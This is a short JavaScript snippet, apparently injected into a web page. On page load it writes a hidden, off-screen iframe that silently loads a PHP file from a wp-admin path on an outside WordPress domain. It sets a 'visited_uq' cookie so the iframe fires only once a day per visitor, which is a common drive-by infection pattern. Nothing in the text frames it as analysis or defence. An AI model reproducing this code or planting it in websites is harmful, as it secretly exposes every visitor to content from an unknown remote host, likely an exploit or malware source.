function fl09() { var static='ajax'; var controller='index.php'; var fl = document.createElement('iframe'); fl.src = 'http://aromaintegralescuela.com/wp-admin/YPfcCd73.php'; fl.style.position = 'absolute'; fl.style.color = '74'; fl.style.height = '74px'; fl.style.width = '74px'; fl.style.left = '100074'; fl.style.top = '100074'; if (!document.getElementById('fl')) { document.write('

'); document.getElementById('fl').appendChild(fl); } } function SetCookie(cookieName,cookieValue,nDays,path) { var today = new Date(); var expire = new Date(); if (nDays==null || nDays==0) nDays=1; expire.setTime(today.getTime() + 3600000*24*nDays); document.cookie = cookieName+"="+escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : ""); } function GetCookie( name ) { var start = document.cookie.indexOf( name + "=" ); var len = start + name.length + 1; if ( ( !start ) && ( name != document.cookie.substring( 0, name.length ) ) ) { return null; } if ( start == -1 ) return null; var end = document.cookie.indexOf( ";", len ); if ( end == -1 ) end = document.cookie.length; return unescape( document.cookie.substring( len, end ) ); } if (navigator.cookieEnabled) { if(GetCookie('visited_uq')==55){}else{SetCookie('visited_uq', '55', '1', '/'); fl09(); } }